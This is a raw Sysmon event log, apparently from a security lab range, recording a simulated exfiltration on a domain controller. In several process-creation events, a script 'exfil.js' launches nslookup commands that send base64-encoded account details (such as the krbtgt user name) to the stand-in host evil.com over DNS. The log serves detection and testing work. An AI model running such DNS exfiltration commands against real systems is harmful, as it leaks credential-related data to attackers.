10341000x8000000000000000209065Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.081{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209064Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.081{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-B143-000000005F02}684C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209063Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.081{2E1864BB-18E0-629A-6742-000000005F02}39766616C:\Windows\System32\WScript.exe{2E1864BB-18EC-629A-B143-000000005F02}684C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209062Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.081{2E1864BB-18EC-629A-B143-000000005F02}684C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyocd.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209061Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.074{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlhqaaxt.tmpMD5=7D9173BD0DB6CB1EF243CECFF708168B,SHA256=E1F06C46829F00B73E93E5CA6A77E87CA3F897BE9C930070FC4C0794E517005D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209060Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.043{2E1864BB-18EC-629A-AF43-000000005F02}3365544C:\Windows\system32\conhost.exe{2E1864BB-18EC-629A-B043-000000005F02}1152C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209059Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.043{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209058Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.043{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-B043-000000005F02}1152C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209057Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.043{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209056Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.043{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209055Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.043{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209054Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.043{2E1864BB-18EC-629A-AE43-000000005F02}54724936C:\Windows\system32\cmd.exe{2E1864BB-18EC-629A-B043-000000005F02}1152C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209053Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.052{2E1864BB-18EC-629A-B043-000000005F02}1152C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EC-629A-AE43-000000005F02}5472C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhqaaxt.tmp 2>&1 10341000x8000000000000000209052Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.027{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EC-629A-AF43-000000005F02}336C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209051Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.027{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EC-629A-AF43-000000005F02}336C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209050Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.027{2E1864BB-18EC-629A-AF43-000000005F02}3365544C:\Windows\system32\conhost.exe{2E1864BB-18EC-629A-AE43-000000005F02}5472C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209049Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.012{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-AF43-000000005F02}336C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209048Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.012{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209047Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.012{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209046Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.012{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209045Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.012{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209044Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.012{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-AE43-000000005F02}5472C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209043Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.012{2E1864BB-18E0-629A-6742-000000005F02}39767336C:\Windows\System32\WScript.exe{2E1864BB-18EC-629A-AE43-000000005F02}5472C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209042Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.015{2E1864BB-18EC-629A-AE43-000000005F02}5472C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhqaaxt.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209041Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.996{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlqlwwm.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044801Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:32.283{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EC11E71CF745A79B60528F516D84A01,SHA256=B9234E826B91B5F567E3139B45AF7E9D7BE5850DAF203D75757AD39E59AE09F3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209727Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.981{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-FA43-000000005F02}6092C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209726Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.981{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209725Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.981{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209724Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.981{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209723Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.981{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209722Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.981{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-F943-000000005F02}6660C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209721Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 